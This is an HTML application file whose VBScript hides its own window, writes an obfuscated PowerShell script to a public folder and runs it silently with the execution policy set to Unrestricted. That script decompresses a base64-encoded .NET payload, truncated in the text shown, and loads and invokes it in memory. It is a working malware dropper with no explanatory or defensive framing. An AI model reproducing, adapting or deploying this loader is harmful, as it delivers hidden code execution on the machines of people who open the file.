<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -7000,-7000
hdkl = "Scripting.FileSystemObject"
Set dd = CreateObject(hdkl)
vcx = "C:\Users\Public\install.ps1"
Set setsz = dd.CreateTextFile(vcx,True)
setsz.WriteLine "try"
setsz.WriteLine "{"
setsz.WriteLine "start-sleep 3"
setsz.WriteLine "$DFGHHXZ = @'"
setsz.WriteLine "7L0LsGXpVd/39WNa89JorkZCAoEZSWN5JF11zt7nsffm4WIeegzSSKOZkQQSGHq6r2Yu9HS3bndLGmGDsGICIcHIYMAEO4ANhVNx2ZCY2C4SUwlxqDI4ECfgBGJDwFSAuGKXC1dsJzj7nLV/3/+/9r3DDClXquySYM7tfc5+fI/1+K//Wt+3H/3gt5czpZSz43//6l+V8tdK/O9Lygv/75Pjf3d9/t+4q/znt/3sa//aqXf97GuffObw+r3Xjq4+fXTh2XsvXrhy5eqNe586uPfo5pV7D6/c+/B7nrj32auXDs6/9KW33zfd47G3lvKuU2fKX/isX/hb3PdXyuvKHacWpfydW0q5Nb4793+M/753969o3fbfp6PdfBsNP7f7vux+/uo/Ucrdu//X3/pn978f++1bynumO3zfLSd08t5z5c7xz+eO5/UvYkx0XW367n+3jsfvsOPzNw4+fmP8e+fPTP3a9vX0sVt89fmj60cXx39H285FR38uN/RLxv8/f3Rw+ep44p1Tm3f3+oVj5z04b+Zv/Hacs23b6XJL+aKxk/f/2C2jTJwup8anXfqtW6pMvJj/vWZxutz/WWV77d7YkGuvGm93Tym3l6Pxm2t33nr/K8aDl972Wb976p6ze2fvuWXvlv3byq33v3L89g3l6M3jOdurb5/+OV59+z3nyt65o6fHw6uv3v4yHvzgrXZw120clL//0r1z+7funbv62dvDXz76gtvq7Xb/3N3uJWXvJUdX0kUvGS96yXTRvf/7mdrkz7t9vOhzxn++5b6jb6z/fvXR363/vvPo7XdM/37zqVfdc+vercO3jR0tR3/+jvro3T93j76t7N129It31MbfdvQP/ODX/OBld9rB0g8e8oNf8IN3vNQO3uUHX+0Hv+AH5++yg72X2cGjfnDTD77DD37TD+65+/kOXuUH5VdO6+CLv+gWHfzIF9vBz/nBP/ODD/5hv6YebCfztnEyb5sms/Q/+vLtbPzkeMY0G7t
setsz.WriteLine "'@"
setsz.WriteLine "$jtwC = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::'FromBase64String'($DFGHHXZ),[IO.Compression.CompressionMode]::Decompress)"
setsz.WriteLine "$Aloshy = New-Object Byte[](382976)"
setsz.WriteLine "start-sleep 3"
setsz.WriteLine "$jtwC.Read($Aloshy, 0, 382976) | Out-Null"
setsz.WriteLine "start-sleep 3"
setsz.WriteLine "[Byte[]] $MyPt = [System.IO.Path]::([System.Threading.Thread]::'GetDomain'().'Load'($Aloshy).'EntryPoint'.Invoke($Null,$Null))"
setsz.WriteLine "$hello = ""Framework64"""
setsz.WriteLine "start-sleep 3"
setsz.WriteLine "$hello2 = ""Framework"""
setsz.WriteLine "[Object[]] $Params=@($MyPt.Replace($hello,$hello2) ,$Aloshy)"
setsz.WriteLine "[System.Threading.Thread]::Sleep(600)"
setsz.WriteLine "return $T.GetMethod('Run').Invoke($null, $Params)"
setsz.WriteLine "} catch { }"
setsz.Close
</script>
<body>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -7000,-7000
TTDXFVVBVB = " -nologo "
CVCVHGRTRT = "powershell.exe"
RRRRYTFDXCXCX = "install.ps1"
REYTUUYC = " Unrestricted"
CVVCVFGTR = " -File C:\Users\Public\"
VCVTRTRUYT = "-ExecutionPolicy"
BVBBVDERTYT = "WScript.Shell"
set BVBVYUIUGHFDF = CreateObject(BVBBVDERTYT)
RENAME = CVCVHGRTRT+TTDXFVVBVB+VCVTRTRUYT+REYTUUYC+CVVCVFGTR+RRRRYTFDXCXCX
BVBVYUIUGHFDF.Run RENAME,0
</script>
</body>
</HEAD>
</HTML>